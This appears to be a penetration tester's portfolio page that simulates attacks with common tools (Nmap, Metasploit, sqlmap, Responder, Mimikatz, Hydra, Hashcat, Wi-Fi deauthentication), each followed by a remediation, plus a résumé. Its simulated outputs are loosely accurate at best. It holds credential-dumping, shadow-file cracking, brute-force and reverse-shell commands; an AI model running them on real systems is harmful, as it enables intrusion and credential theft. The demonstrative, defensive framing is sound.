itskilltroll

  • 6nodes
  • 8years

Ali Omar Alaskari

Founder, Chief Creative Visionary & Developer of Solnyshko Jewellery.
Penetration Tester || Operations Coordinator , OSCP / CEH / NSE / Web3 / N8N Workflow

English: Fluent Arabic: Fluent
Solnyshko
SoloMedic
TIB
Al-Hadbaa
Grid
Infrastructure
Simple Attacks Simulations
Career

Nmap | Advanced Network Discovery & Vulnerability Auditing

ENGINE: NSE_ENGINE_v7.94
1
Host Discovery & Port Enumeration
Attacker scans target subnets to identify live assets and open ports.
#nmap -sS -p 22,80,443,8080 -T4 10.10.14.0/24 Nmap scan report for target-node.local (10.10.14.55)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy
2
Service Version Fingerprinting
Attacker queries open ports to isolate outdated banner software versions.
#nmap -sV --version-intensity 5 10.10.14.55 -p 8080 PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat 9.0.16
3
Vulnerability Exploitation Matrix
Attacker launches NSE scripts to verify known remote code execution bugs on the discovered software version.
#nmap --script http-vuln-cve2019-0232 10.10.14.55 -p 8080 | http-vuln-cve2019-0232:
| VULNERABLE:
| Apache Tomcat CGI Remote Code Execution
Defensive Remediation & Prevention
Disable CGI program initializations inside the configuration environment or upgrade runtime architectures.
#apt-get --only-upgrade install tomcat9 [REMEDIATION] Tomcat package successfully upgraded to stable branch. Banner probing now returns secure states.

BloodHound | Active Directory Graph Trust Auditing

SOURCE: GITHUB/BLOODHOUNDAD
1
Domain Asset Ingestion
Attacker drops an ingestor tool on a compromised workstation to collect directory properties.
C:\>SharpHound.exe --CollectionMethods All --Domain corp.local [*] Status: 4322 objects enumerated.
[+] Output file generated: 20260516_BloodHound.zip
2
Attack Path Mapping Analysis
Attacker parses ingestion data inside a neo4j graph database interface to calculate permission abuse paths.
neo4j$MATCH p=shortestPath((u:User)-[:GenericAll|WriteDacl*1..]->(g:Group {name:'DOMAIN ADMINS'})) RETURN p [PATH DETECTED] Standard User -> HelpDesk Group -> ForceChangePassword -> Domain Admin.
3
Privilege Escalation Execution
The attacker abuses the mapped nested loops to hijack the administrative object privileges.
#powerview-modify -identity "HelpDesk" -add "Domain Admins" [+] Escalation Complete. Operational identity has inherited absolute controller access nodes.
Defensive Remediation & Prevention
Implement Tiered Administration constraints and remove dangerous Active Directory DACL permissions manually.
PS C:\>Remove-ADPrincipalAccessControlEntry -Identity "Domain Admins" -AccessControlEntry $dangerousACE [REMEDIATION] High-risk inheritance ties severed. Mapped attack path broken.

Burp Suite Professional | Web Infrastructure Exploitation

ENV: PROXY_127.0.0.1:8080
1
Proxy Traffic Interception
Attacker captures ongoing web requests to analyze API architecture variables.
#curl -x http://127.0.0.1:8080 -kv https://target-app.local/api/v1/profile > GET /api/v1/profile HTTP/1.1
> X-User-ID: 1004
2
BOLA / IDOR Parameter Tampering (Repeater)
Attacker alters object identification parameters to fetch sensitive records across client profiles without authorization.
#cat modification.txt | nc 127.0.0.1 8080 HTTP/1.1 200 OK
{"status": "success", "username": "corporate-CEO", "api_key": "sec_prod_99182"}
3
Automated Payload Harvesting
Attacker passes parameter ranges to the Intruder engine to dump full tables sequentially.
Defensive Remediation & Prevention
Enforce session-bound access token evaluations directly on object reference checks inside backend control scripts.
if (request.user.id !== resource.owner_id) { throw New AuthorizationException(); } [REMEDIATION] Parameter manipulation now returns explicit 403 Forbidden validation blocks.

Metasploit Framework | Remote Code Execution (RCE) Pipeline

FRAMEWORK: MSFCONSOLE v6
1
Exploit Vector Alignment
Attacker structures payload pathways against known application buffer memory errors.
msf6 >use exploit/linux/http/unauth_rce_payload
2
Payload Injection & Target Context Bind
Attacker binds parameters to remote assets and initiates memory exploitation.
msf6 exploit(...) >set RHOSTS 10.10.14.55 && set LHOST 10.10.14.4 && exploit [*] Triggering application memory sub-stack overwrite execution...
3
Interactive Reverse Meterpreter Shell Upgrade
The attacker successfully gains interactive terminal control over core network assets.
meterpreter >sysinfo Computer: Core-App-Server // OS: Linux Enterprise Production
Defensive Remediation & Prevention
Deploy Web Application Firewalls (WAF) to drop payload signature frames and apply system vendor hotfixes.
#systemctl enable modsecurity && systemctl start modsecurity [REMEDIATION] Memory injection parameters dropped by proxy layer pattern checking rules.

Sqlmap | Automated Database Injection Testing

ENGINE: SQLMAP_CORE_v1.7
1
Parameter Vulnerability Analysis
Attacker analyzes URL query structures to verify database error returns.
#sqlmap -u "https://target-app.local/items.php?id=1" --batch [INFO] heuristic test shows that GET parameter 'id' is highly injectable via boolean-based blind techniques.
2
Relational Data Extraction
Attacker extracts underlying schemas and maps internal relational database names.
#sqlmap -u "https://target-app.local/items.php?id=1" --dbs available databases [2]:
[*] information_schema
[*] production_user_vault
3
Credential Exfiltration Dump
Attacker targets transactional credential tables to dump operational application password data.
#sqlmap -u "https://target-app.local/items.php?id=1" -D production_user_vault -T credentials --dump | admin | e99a18c428cb38d5f260853678922e03 (SHA256) |
Defensive Remediation & Prevention
Migrate raw query assembly structures to Parameterized Queries / Prepared Statements.
$stmt = $pdo->prepare('SELECT * FROM items WHERE id = :id');
$stmt->execute(['id' => $id]); [REMEDIATION] SQL command instructions separate from input fields. Payload input treated purely as data strings.

Wireshark | Transport Sniffing & Data Extraction

LAYER: WIRE_INGEST_PCAP
1
Promiscuous Mode Traffic Capturing
Attacker hooks onto local interfaces to ingest passing layer-2 transmission packets.
#tshark -i eth0 -w data_stream.pcap Capturing on 'eth0' // Packets captured: 1422
2
Cleartext Stream Isolation
Attacker applies explicit structural filter properties to look for unencrypted protocol requests.
#tshark -r data_stream.pcap -Y "http.request.method == POST" 10.10.14.82 -> 10.10.14.55 HTTP POST /login.php
3
Payload Session Reassembly
Attacker tracks the data frame sequence arrays to reconstitute cleartext session configurations.
#tshark -r data_stream.pcap -z proto,colinfo,http.auth Extracted Parameter payload: Authorization=Basic dXNlcjpQYXNzd29yZDEyMyE=
Defensive Remediation & Prevention
Enforce Strict Transport Security (HSTS) and update communication channels to explicit TLS 1.3 models.
Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload" [REMEDIATION] Unencrypted communication channels deprecated. Raw network streams are now securely encrypted.

Responder | Link-Local Resolution Poisoning Audit

SOURCE: GITHUB/LGANDELF
1
Resolution Broadcast Interception
Attacker listens for failed internal domain name name queries broadcasted by systems on the local network subnet.
#python3 Responder.py -I eth0 -rdv [+] Listening for LLMNR / NBT-NS broadcast resolution lookups...
2
Spoofed Challenge Injection
Attacker returns spoofed resolution responses, making the target system believe the attacker is the server it was looking for.
[LLMNR]Poisoned answer sent to 10.10.14.88 for query 'payroll-server'
3
Cryptographic Hash Interception
The victim computer automatically attempts to log in to the attacker's spoofed server, leaking its NTLM authentication hash.
[+] [NTLMv2-Response] Captured Workstation Hash:
jdoe::CORP:4b22a1f8...:e10b948
Defensive Remediation & Prevention
Disable legacy LLMNR and NBT-NS protocol lookups through Local Group Policy settings.
C:\>reg add "HKLM\Software\Policies\Microsoft\Windows NT\DNSClient" /v TurnOffMulticast /t REG_DWORD /d 1 /f [REMEDIATION] Legacy fallback resolution mechanisms disabled across domain registries. Poisoning vectors mitigated.

Wireless Exploitation & 802.11 WPA/WPA2 Audit

PHY: 802.11_MONITOR_MODE
1
Monitor Interface Alignment
Attacker unlocks wireless hardware constraints to map out physical local radio frequencies.
#airmon-ng start wlan0 && airodump-ng wlan0mon BSSID CH ENC AUTH ESSID
AA:BB:CC:DD:EE:FF 6 WPA2 PSK Corporate_HQ_WiFi
2
Deauthentication Injection Sequence
Attacker transmits forged frames to disconnect legitimate users from the network access points.
#aireplay-ng --deauth 15 -a AA:BB:CC:DD:EE:FF wlan0mon Sending DeAuth frames to target station channels...
3
4-Way Authentication Handshake Ingestion
As the disconnected user's device automatically reconnects, the attacker captures the authorization handshake packet sequence.
[+] [WPA Handshake Captured: AA:BB:CC:DD:EE:FF] Saved to local capture arrays.
Defensive Remediation & Prevention
Upgrade older pre-shared key protocols to Enterprise Grade WPA3 frameworks with protected management frames.
[REMEDIATION] Access point configured to WPA3-Enterprise using 802.1X authentication. Deauthentication injection attempts are dropped by the client hardware.

Mimikatz | OS Memory Credential Extraction

RUNTIME: WIN_X64_SYSTEM
1
Debug Privilege Escalation
Attacker increases local process tokens to allow debugging access into operating system processes.
mimikatz #privilege::debug Privilege '20' OK
2
LSASS Runtime Volatile Dump
Attacker accesses the active Local Security Authority Subsystem Service runtime sub-memory to scan for credential materials.
mimikatz #sekurlsa::logonpasswords
3
Active Hash Artifact Extraction
Attacker extracts cleartext passwords or NTLM validation blocks belonging to logged-in enterprise accounts.
Domain : CORPORATE // User : DomainAdmin
[*] NTLM-hash : 2b576ac5d912440c9ae70678912e865c
Defensive Remediation & Prevention
Enable Windows Credential Guard to isolate LSASS memory pools inside virtualized secure spaces.
C:\>reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa" /v LsaCfgFlags /t REG_DWORD /d 1 /f [REMEDIATION] Credential Guard successfully locked memory boundaries. Non-virtualized process calls are blocked.

Hydra | Multi-Protocol Network Authentication Tester

MODULE: HYDRA_ENGINE_v9.5
1
Target Context Vector Selection
Attacker identifies authentication portals on public endpoints, such as remote SSH management systems.
#hydra -l operator -P rockyou.txt ssh://10.10.14.55 -t 4 -V
2
High-Speed Brute-Force Injection
Attacker automatically fires hundreds of login credential iterations from custom dictionaries against the target server port.
[ATTEMPT] login "operator" - password "password125" - 14 of 10000
[ATTEMPT] login "operator" - password "shadow1" - 15 of 10000
3
Authentication Hook Verification
The engine successfully identifies a valid protocol entry token combination.
[22][ssh] host: 10.10.14.55 login: operator password: Summer2026!
Defensive Remediation & Prevention
Install rate-limiting utilities like fail2ban to dynamically ban attacking IPs after repeated failed attempts.
#fail2ban-client set sshd bantime 86400 [REMEDIATION] Connection tracking rules deployed. Attacking hosts are instantly blocked at the firewall level.

Hashcat | GPU-Accelerated Cryptographic Recovery

ACCELERATION: OPENCL_GPU_GRID
1
Signature Format Detection
Attacker identifies the exact algorithm structure of an acquired target password hash.
#hashcat --identify encrypted_secret.txt [+] MD5 [Hash-Mode 0] // [+] SHA-256 [Hash-Mode 1400]
2
GPU Workspace Crunch Alignment
Attacker loads dictionary matching matrices combined with character mutations over GPU processing arrays.
#hashcat -m 1400 encrypted_secret.txt wordlist.txt -r rules/best64.rule
3
Cryptographic Crack Return
The high-velocity computing matrix successfully reverses the original password text.
Hash.Target......: e99a18c428cb38d5f260853678922e03
Hash.Password....: SecOpsManager2026! (Status: Cracked)
Defensive Remediation & Prevention
Migrate database storage schemas away from simple legacy hashing algorithms to adaptive, high-work-factor functions like Argon2id or bcrypt.
$hashedPassword = password_hash($input, PASSWORD_ARGON2ID); [REMEDIATION] Memory-hard slow hashing algorithms deployed. Offline dictionary cracking speeds rendered useless.

John the Ripper | Local System Password Auditing

MODE: CORE_MUTATION
1
Shadow File Ingestion Mapping
Attacker reads protected operating system accounts and groups system authentication components into a single file.
#unshadow /etc/passwd /etc/shadow > local_passwords.txt
2
Rule Mutation Execution
Attacker initiates wordlist comparison sweeps to verify whether users have set simple or easily guessable credentials.
#john --rules --wordlist=rockyou.txt local_passwords.txt
3
Root Level Password Recovery
The engine completes verification scans and reveals low-entropy administrative passwords.
Loaded 2 password hashes...
password123 (root)
Defensive Remediation & Prevention
Enforce PAM complexity configurations inside authentication modules to block weak password selections during setup.
password required pam_pwquality.so retry=3 minlen=14 dcredit=-1 ucredit=-1 [REMEDIATION] Minimum password length limits and complexity parameters actively enforced by the OS kernel.

BurpSuite

Auditing web application security by intercepting and analyzing live traffic.

Metasploit

Executing modular exploits and managing payloads for full-scale penetration tests.

Wireshark

Analyzing network protocols and diagnosing infrastructure traffic bottlenecks.

Wireless Security

Assessing Wi-Fi resilience using Aircrack-ng, Airegeddon, and Hashcat.

Hashcat

Testing cryptographic hash strength and password security policies.

Full-Stack Dev

Architecting secure web applications with modern frontend frameworks.

ZONE 01 // SOURCE CONTROL ZONE 02 // CLOUDFLARE EDGE & SEC ZONE 03 // RESOLUTION & DOMAINS solnyshko-jewels-repo solomedic-suite-repo CF WAF // Solnyshko R2 Storage [Jewelry Models] CF WAF // SoloMedic R2 Storage [Platform Assets] WordPress Domain Root WordPress Domain Root

PRODUCTION_INFRASTRUCTURE_MONITOR

TARGET NODE:Select components...
OPERATIONAL STATE:
NETWORK ADDRESS:
ARCH TYPE:

Topological map tracking interactive real-world pipeline assets initialized. Select any environment module or active storage layer instance to verify routing paths, protection systems, and deployment loops.

Founder & Chief Creative Visionary & Developer

solnyshkojewellery
2023 — Present

With an exceptional eye for classical luxury and modern form, AliOmar leads the artistic direction, turning avant-garde concepts into iconic, production-ready jewelry architectures.

SoloMedic Platform Development

SoloMedic
2026 — Present
  • Platform Architecture: Designed the digital foundation for SoloMedic, focusing on a premium UI and healthcare-centered logic.
  • Financial Integration: Implemented secure payment systems for local Iraqi banking (FIB, Super Qi) and international USDT/Crypto.
  • Automation & AI: Leveraged n8n and Gemini API to streamline platform workflows and content generation.
  • Asset Security: Configured Cloudflare WAF rules to protect proprietary platform data and prevent unauthorized access.
  • Sponsorship Framework: Engineered a scalable tiered system to facilitate and manage diverse healthcare funding opportunities.

IT Engineer — Support & Administration

Al-Taif Islamic Bank
2023 — Present

Network Infrastructure & Hardware Deployment

  • Infrastructure Design: Expert in network rack integration, including structured cabling, professional wiring, and ongoing hardware maintenance.
  • Hardware Implementation: Proficient in the installation and configuration of network-attached resources, including NVRs, NAS systems, and IP-based peripherals.
  • Telecommunications: Experience in the deployment and configuration of Panasonic PBX systems.

Systems Administration & Identity Management

  • Directory Services: Advanced management of Azure Active Directory and on-premises Windows Domain environments, including user/computer object administration and Group Policy enforcement.
  • Endpoint Management: Managed centralized update deployment via WSUS to ensure enterprise-wide security compliance.
  • Multi-Factor Authentication: Implementation of FortiAuthenticator tokens to secure domain access.

Network Services & Storage Solutions

  • DNS Management: Configuration and optimization of Domain Name Servers and DNS zones using Bind9 and Unbound.
  • Storage & Redundancy: Comprehensive administration of QNAP NAS devices, including data redundancy (RAID), backup scheduling, and user access restrictions.
  • System Monitoring: Proactive oversight of network health, monitoring servers, desktops, and storage devices to ensure maximum uptime.

Technical Support & Troubleshooting

  • L2/L3 Support: Providing high-level technical assistance by identifying, investigating, and resolving complex hardware and software bottlenecks.

Offensive Security & Ethical Hacking

Self-Employeed
2018 — 2023
  • Adversarial Simulation & Web Exploitation: Conducted comprehensive penetration testing across various Operating Systems (Windows/Linux) and web applications; identified and exploited high-severity vulnerabilities including Local File Inclusion (LFI), Directory Traversal, and Open Redirect flaws.
  • AV Evasion & Payload Development: Developed custom obfuscation and encryption techniques to evaluate the effectiveness of Anti-Virus (AV) and Endpoint Detection and Response (EDR) solutions.
  • Active Directory Exploitation: Executed advanced post-exploitation techniques, including Privilege Escalation, Lateral Movement, and Kerberoasting, to assess AD forest security.
  • Exploitation Frameworks: Proficient in executing Remote Code Execution (RCE) and shell management within controlled testing environments.

Network & Wireless Security

  • Traffic Analysis & Man-in-the-Middle (MITM): Performed deep-packet inspection, packet sniffing, and network spoofing (ARP/IP); utilized SSL Stripping to evaluate the integrity of encrypted communication channels.
  • Wireless Security Auditing: Assessed wireless infrastructure resilience by simulating Evil Twin attacks, captive portal phishing, and Denial of Service (DoS) scenarios.
  • RF & Cellular Security: Utilized SDR (Software Defined Radio) tools like HackRF for IMSI analysis and signals intelligence research.

Defensive Security & Infrastructure

  • Threat Intelligence & Deception: Deployed and managed Honeypots to track adversary tactics, techniques, and procedures (TTPs) for proactive threat mitigation.
  • Zero Trust Architecture: Orchestrated secure remote access and identity-verified networking using Twingate (ZTNA).
  • Load Balancing & High Availability: Managed enterprise-grade traffic distribution and application delivery via Kemp Load Balancers.

Bachelor of Engineering

Al-Hadba University College
2018 — 2022

Specialization: Computer Networking Specialist. Mosul, Iraq.

Title

Body

itskilltroll@infrastructure:~
Initializing secure session framework over TLS 1.3...
Authentication bypass verification: COMPLETED.
guest@itskilltroll:~#